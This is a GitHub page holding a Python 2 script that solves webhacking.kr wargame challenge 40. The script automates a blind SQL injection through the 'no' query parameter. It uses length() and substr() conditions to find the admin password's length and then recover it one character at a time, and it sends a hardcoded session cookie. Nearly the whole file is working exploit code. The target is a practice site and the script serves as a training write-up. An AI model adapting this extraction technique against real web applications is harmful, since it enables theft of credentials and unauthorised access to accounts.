-
Notifications
You must be signed in to change notification settings - Fork 0
/
Challenge40.py
83 lines (71 loc) · 2.51 KB
/
Challenge40.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#-*- coding: utf-8 -*-
import sys
import urllib2
import CookieManager
challengeUrl = "http://webhacking.kr/challenge/web/web-29/index.php"
trueCondition = "admin password"
print "[*] Find admin password length"
passwordLength = 0
isFoundPassword = False
CookieManager.addCookie("PHPSESSID", "0eb95c9c96a3a8bc908e5d828f22cc3b")
for passwordLength in range(1, 20):
parameters = "?no=-1||no=2%26%26length(pw)=" + str(passwordLength) + "&id=0x61646d696e&pw=guest"
httpRequest = urllib2.Request(challengeUrl + parameters)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
httpConnection = urllib2.urlopen(httpRequest)
httpResponse = httpConnection.read()
print "[*] Blind SQL Injection...", passwordLength
if httpResponse.find(trueCondition) > 0:
print "[+] FIND IT! password length is [", passwordLength, "]"
isFoundPassword = True
break
except:
raise
finally:
if httpConnection != None:
httpConnection.close()
if not isFoundPassword:
sys.exit(-1)
passwordValue = ""
print
print "[*] Find admin password"
for caretIndex in range(1, passwordLength+1):
print
print "[*] Blind SQL Injection...", caretIndex, "",
for charIndex in range(0x5b, 0x7b):
sys.stdout.write(".")
parameters = "?no=-1||2%26%26substr(pw," + str(caretIndex) + ",1)=" + hex(charIndex) + "&id=guest&pw=guest"
httpRequest = urllib2.Request(challengeUrl+parameters)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
httpConnection = urllib2.urlopen(httpRequest)
httpResponse = httpConnection.read()
if httpResponse.find(trueCondition) > 0:
print
print "[+] FIND IT!", chr(charIndex)
passwordValue += chr(charIndex)
break
except:
raise
finally:
if httpConnection != None:
httpConnection.close()
print "[+] Admin password is [", passwordValue, "]"
print
print "[*] Clear Challenge 40"
parameter = "?auth=luck_admin"
httpRequest = urllib2.Request(challengeUrl+parameter)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpConnection = None
try:
httpConnection = urllib2.urlopen(httpRequest)
httpResponse = httpConnection.read()
print httpResponse
except:
raise
finally:
if httpConnection != None:
httpConnection.close()